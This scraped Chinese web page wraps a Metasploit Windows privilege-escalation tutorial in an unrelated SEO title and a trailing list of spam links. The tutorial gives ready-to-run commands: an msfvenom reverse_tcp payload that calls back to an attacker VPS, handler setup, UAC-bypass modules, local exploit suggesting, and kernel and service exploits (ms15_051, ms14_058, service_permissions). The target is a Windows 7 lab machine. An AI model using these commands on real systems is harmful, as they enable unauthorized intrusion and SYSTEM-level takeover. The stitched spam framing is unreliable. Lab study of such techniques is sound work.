当前位置: 首页 > news >正文

网站返利二维码怎么做阜新网站seo

网站返利二维码怎么做,阜新网站seo,做网站还是租用服务器,咖啡网站设计模板一、bypassuac 用户账户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也…

一、bypassuac

       用户账户控制User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。--  百度

当getsystem命令提权失败,就需要绕过系统UAC来进行提权。

攻击机:Kali Linux

靶    机:Windows 7旗舰版

1.上线MSF,获得会话

生成payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your-vps-ip lport=8808 -f exe -o msf.exe

设置侦听:

#handler -H your-ip -P 8808 -p windows/x64/meterpreter/reverse_tcp

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost your-ip
set lport 8899
exploit

2.使用bypassuac模块

search bypassuac

以下模块都可以尝试,直到成功获取权限

use 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost  your-ip

set lport  6666

set session 1

show target

set target 1

exploit

 getsystem

获取hash


二、Local_exploit_suggester

 local_exploit_suggester 是一个漏洞利用后渗透模块,可用于检查系统中是否存在本地漏洞。它执行本地漏洞利用检查;但不会运行利用任何漏洞,这意味着可以在不进行入侵的情况下扫描系统。不必手动搜索有效的本地漏洞;它将根据系统的平台和体系结构向您显示目标容易受到哪些攻击。

rev2self   #降级为普通权限

use post/multi/recon/local_exploit_suggester
set session 1
exploit

 探测出10个模块

bypassuac_dotnet_profiler

rev2self   #降级为普通权限

use exploit/windows/local/bypassuac_dotnet_profiler
set session 1
run

有一个提示:此漏洞利用需要手动清除'C:\Users\whoami\AppData\Local\Temp\HflSEhA.dll!

bypassuac_eventvwr

rev2self   #降级为普通权限

use exploit/windows/local/bypassuac_eventvwr
set session 1
set payload windows/x64/meterpreter/reverse_tcp
set target 1
exploit

cve_2020_1054_drawiconex_lpe

use exploit/windows/local/cve_2020_1054_drawiconex_lpe

 set session 1

run

提权失败  #10个模块里,不是每个模块都可以成功利用,

CVE-2019-1458-wiozardopium

use exploit/windows/local/cve_2019_1458_wizardopium
set session 1
run

这个也没有利用成功

Windows内核漏洞提权

enum_patches

探测系统补丁:

use post/windows/gather/enum_patches
set session 1
run

在线网站查询补丁对应漏洞
https://i.hacking8.com/tiquan

Windows-Exploit-suggester

查找系统漏洞可利用模块:

use post/multi/recon/local_exploit_suggester
set session 1
run

Windows ClientCopyImage Win32k Exploit

此模块适用于Win7、Win server 2008R2 SP1 x64

use exploit/windows/local/ms15_051_client_copy_image

set payload windows/x64/meterpreter/reverse_tcp

set lport 6666
set session 2

set  target 1
exploit

getuid 查看权限

getsystem 提升权限       # rev2self   #降级为普通权限

 Windows TrackPopupMenu Win32k NULL指针解引用

ms14_058_track_popup_menu

use exploit/windows/local/ms14_058_track_popup_menu

set payload windows/x64/meterpreter/reverse_tcp

set lport 6666
set session 2

set  target 1
exploit

运行后,直接获得system权限

Windows系统服务漏洞提权

unquoted_service_path       #可信任服务路径漏洞

靶机:Windows7 专业版/旗舰版  #都没有攻击成功

use exploit/windows/local/unquoted_service_path

set payload windows/x64/meterpreter/reverse_tcp

set session 1
exploit

 结果显示:由于失败而中止利用漏洞:不易受攻击:找不到存在受信任路径问题的服务

service_permissions模块

use exploit/windows/local/service_permissions

set payload windows/x64/meterpreter/reverse_tcp

set session 1
exploit

 运行后,获得system权限

always_install_elevated模块

use exploit/windows/local/always_install_elevated

set payload windows/x64/meterpreter/reverse_tcp

set session 1
run

#利用漏洞攻击已完成,但未创建会话。

 ...

http://www.qdjiajiao.com/news/8366.html

相关文章:

  • 闵行区人民政府官网河南网站推广优化
  • 东莞创意网站设计长春网站优化服务
  • 莆田交友网站市场企业整站优化
  • 北京app手机网站制作百度答主中心入口
  • python网站开发项目优化大师软件下载
  • wordpress 不同分类不同模板专业的seo外包公司
  • 蜗牛星际做网站广点通投放平台
  • 泽库网站建设公司女生读网络营销与电商直播
  • 修改wordpress登录框常州网站优化
  • 婚庆公司网站建设策划书百度公司网站推广怎么做
  • 济南网站制作价格怎样推广app
  • 前端是wordpress做的吗seo网络营销案例分析
  • 臭事百科wordpress山西seo
  • 政府门户网站设计方案安卓优化大师app下载安装
  • 网站和微信公众号建设方案app推广引流
  • 南阳企业网站建设公司成都十大营销策划公司
  • 产品网站免费模板下载百度词条
  • 建站需要哪些东西网络营销的含义
  • 接单子做网站词百度app下载
  • 有没有好的网站是JSP做的软文发稿系统
  • 江门网站优化网络营销的8个基本职能
  • 网站开发技术基础教程如何在百度推广自己的产品
  • 软件开发全流程合肥seo优化排名公司
  • wap 企业网站汽车网站建设方案
  • 网站上的广告怎么做个人网页设计作品模板
  • wordpress grace主题北京优化靠谱的公司
  • 莆田建网站公司搜索引擎优化解释
  • 国家示范建设成果网站网络广告名词解释
  • 支付网站怎么做的网站建设的基本流程
  • 南京专业做网站公司海口seo计费